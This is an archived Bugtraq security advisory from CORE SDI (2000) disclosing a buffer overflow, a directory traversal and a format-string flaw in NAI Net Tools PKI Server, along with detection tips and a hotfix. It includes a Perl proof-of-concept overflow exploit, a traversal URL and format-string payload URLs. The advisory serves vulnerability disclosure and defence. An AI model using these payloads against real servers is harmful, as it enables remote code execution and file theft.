OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: NAI Net Tools PKI Server vulnerabilities
From: Iván Arce (core.lists.bugtraqCORE-SDI.COM)
Date: Wed Aug 02 2000 - 22:32:40 CDT


-----------------------------------------------------------------------

                             CORE SDI S.A.
                        Buenos Aires, Argentina
                       <http://www.core-sdi.com>

                        CORE SDI Security Advisory
                             August 2nd, 2000

                NAI Net Tools PKI Server vulnerabilities

-----------------------------------------------------------------------

While investigating the exploitability of a buffer overflow in
the Net Tools PKI Server from Network Associates Inc. we discovered
three new vulnerabilities not fixed by hotfix 1, released to fix
problems reported by Jim Stickley from Garrison Technologies Inc.
(see http://www.securityfocus.com/bid/1363 and
 http://www.securityfocus.com/bin/1364)

Problem description
~~~~~~~~~~~~~~~~~~~~

 Problem #1: Buffer overflow in strong.exe

 A buffer overflow in the web server component of the
 Net Tools PKI server allows a remote attacker to execute
 arbitrary code as SYSTEM on the machine running it.

 To determine whether anyone has attempted to exploit this
 vulnerability, check the enroll-access.log and the
 admin-access.log files in the WebServer/logs directory of your
 Net Tools PKI Server installation. Search for any log entries
 which are excessively long (greater than 500 characters). Each
 log entry can then be examined to see the IP address of the
 computer that submitted the request.

 Problem #2: Directory traversal vulnerability

 The default installation of Net Tools PKI server allows
 a remote attacker to view and download any file residing
 on the server.

 To determine whether anyone has attempted to exploit this
 vulnerability, check the enroll-access.log and the
 admin-access.log files in the WebServer/logs directory of your
 Net Tools PKI Server installation. Search for any log entries
 containing "..\" within them. Each log entry can then be examined
 to see the IP address of the computer that submitted the request.

 Problem #3: Format strings with user supplied data

 The Net Tools PKI Server fail to validate properly the data
 passed as arguments to the server's logging routines and
 allows a remote attacker to execute arbitary code as
 SYSTEM on the machine running it.

Impact
~~~~~~

Problem #1: Remote unauthenticated access to the PKI Server,
            execution of arbitrary commands as the user running
            the enrollment server (System)

Problem #2: Remote unauthenticated access to any file on the PKI
            server

Problem #3: Remote unauthenticated access to the PKI Server,
            execution of arbitrary commands as the user running
            the enrollment server (System)

Technical details
~~~~~~~~~~~~~~~~~

 Problem #1: Buffer overflow in strong.exe

 Strong.exe is the web server component of the PKI Server,
 it services requests over SSL on ports 443/tcp, 444/tcp and
 445/tcp (default ports).
 While connections to port 443/tcp require both client and
 server autentication using certificates, connections to
 port 444/tcp requires no client authentication, therefore
 any user with network connectivity to the PKI server can
 connect via HTTPS to that port.

 The service running on port 443/tcp is called the
 Administrative Web Server and its therefore obvious the requirement for
 mutual authentication.
 The service running on port 444/tcp is the Enrollment Web Server
 and does not require a client side certificate by default.
 Both web servers are actually Virtual servers serviced by
 strong.exe

 A buffer overflow is present in the function that generates log data,
 that allows to overwrite the stack using user supplied data passed
 to the server as an URL in the HTTPS request.

  https://host:444/<2965 'A' chars>

EAX=66206465 EBX=00F3E1C0 ECX=01FFF224 EDX=20414141
EDI=00000000 EBP=01FFFE60 ESP=01FFF258 EIP = 0040977B

The value in EAX is part of the string (DATE+PATH+FILE+REASON)
that gets logged, detailing the reason for the failure.
Since it is not a valid address, a segmentation fault is rised
a few instructions after the overwrite:

 mov ecx,[eax+000000E4]

 The above does not overwrite EIP and it kills the
 server before its overwritten, but a slight variation of it
 will let an attacker overwrite EBP, EIP and by carefully
 overwriting local variables, control the execution of arbitrary
 code on the target machine.

 A sample, proof of concept perl script exemplifies this:

-- cut here
#!/usr/bin/perl
# NAI NetTools PKI SERVER 1.0 - Long URL Stack Overflow Exploit
# Replace host and port an create the html file:
#./pkiluso.pl > test.html
#Open the html in a SSL compatible browser and click on the link. puf!
#Juliano Rizzo (c) 2000 julianocore-sdi.com

$host = "localhost";
$port = "444";
$shell_code= "\x90\x90\x90\x90";

#We can set the values of EIP and EBP, our code is on the stack
#and in 0x01613A2E.
$eip = "\x2E\x3A\x61\x01";#0x01613A2E (URL readed from socket)
#$eip = "\x64\x83\x40%00";#0x00408364 (CALL EBP)
$ebp = "\xCB\xF2\01\x02"; #0x0200F2CB (trunca el string por el 00)
$noplen = (2965 - length($shell_code));
print "<html><body><a href=\"https://".$host.":".$port."/";
print "\x90"x$noplen;
print
$shell_code.$ebp.$eip."\x18\x6B\x62\x01\x18\x6B\x62\x01\x18\x6B\x62\x01".
"\">Click here to exploit.!</a></body></html>";

note: wrapped for readability

----

Problem #2: Directory traversal vulnerability

By specifying '..\' in HTTPS requests to the enrollment server, an attacker can navigate the server's file system and view/download any file if its name is known. By default the enrollment server uses \Program Files\Network Associates\Net Tools PKI Server\WebServer\enroll-server as the Web Root directory, if a file name is known (ie. autoexec.bat) the attacker just needs to supply the remaining path components to access it:

https://host:444/..\..\..\..\..\autoexec.bat

will display the contents of the file in the browser

If a filename is not known, the web server will reveal its web root directory in an error messages shown to the client:

https://host:444..\..\pirulo.pdf will result in:

File Not Found

The requested URL /..\..\pirulo.pdf was not found on this server.

There was also some additional information available about the error: [Tue Jun 27 19:47:33 2000] access to C:\Program Files\Network Associates\ Net Tools PKI Server\WebServer\enroll-server/..\..\pirulo.pdf failed for a.b.c.d, reason: File does not exist

Problem #3: Format strings with user supplied data

The user supplied URL is processed by Strong.exe and if the .XUDA extension is found, the request is forwarded to XUDAD.EXE for futher processing. Prior to this "hand-off" the URL string is parsed, filtered for metacharacters and passed to a function that logs the request. Somewhere along the processing path, the user supplied data becomes the format string for a formatted output function similar to the ANSI C sprintf(). This allows a remote attacker to provide data that will force that function into overwritting arbitrary portions of the process memory and cause either a denial of service attack or the execution of arbittrary code.

To exemplify this, the following URL will cause a DoS:

https://host:444/%25%25s.xuda

Notice that the hex value 0x25 represent the ASCII character '%', thus the URL string will get converted to "%%s.xuda" and subsequentelly to "%s.xuda".

A more elaborated attack, might try to overwrite the return address on the stack to force the server into executing arbitrary code.

Proof of concept , sample URL:

https://host:444/xxx%3c%b9%ff%01%25%25x%25%25x%25%25x%25%25x%25%25x%25\ %25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\ %25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\ %25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\ %25x%25%25x%25x%25n.xuda

note: the string has been wrapped for readability.

Fix information ~~~~~~~~~~~~~~~ Network Associates Inc. has released Hotfix 3 for the Net Tools PKI Server. It corrects the three problems. It can be obtained from:

http://www.nai.com/asp_set/download/upgrade/find.asp

Or contact Network Associates Technical support at 1-800-722-3709.

Vulnerable systems ~~~~~~~~~~~~~~~~~~ Net Tools PKI server 1.0 for NT Net Tools PKI server 1.0 for NT (hotfix 1) Net Tools PKI server 1.0 for NT (hotfix 2)

Additional information ~~~~~~~~~~~~~~~~~~~~~~ These vulnerabilities were discovered by Juliano Rizzo at CORE SDI S.A.

Previous problems were found and reported to Network Associates Inc. by Jim Stickley from Garrison Technologies Inc.

We wish to thank Network Associates Inc. for their prompt response to the issues rised by this advisory.

Copyright Notice: ~~~~~~~~~~~~~~~~~ The contents of this advisory are copyright (c) 2000 CORE SDI S.A. and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

$Id: PKI_Server-advisory.txt,v 1.4 2000/08/02 18:15:40 iarce Exp $

-- "Understanding. A cerebral secretion that enables one having it to know a house from a horse by the roof on the house, It's nature and laws have been exhaustively expounded by Locke, who rode a house, and Kant, who lived in a horse." - Ambrose Bierce

==================[ CORE Seguridad de la Informacion S.A. ]========= Iván Arce Presidente PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A email : iarcecore-sdi.com http://www.core-sdi.com Pte. Juan D. Peron 315 Piso 4 UF 17 1038 Capital Federal Buenos Aires, Argentina. Tel/Fax : +(54-11) 4331-5402 Casilla de Correos 877 (1000) Correo Central =====================================================================

--- For a personal reply use iarcecore-sdi.com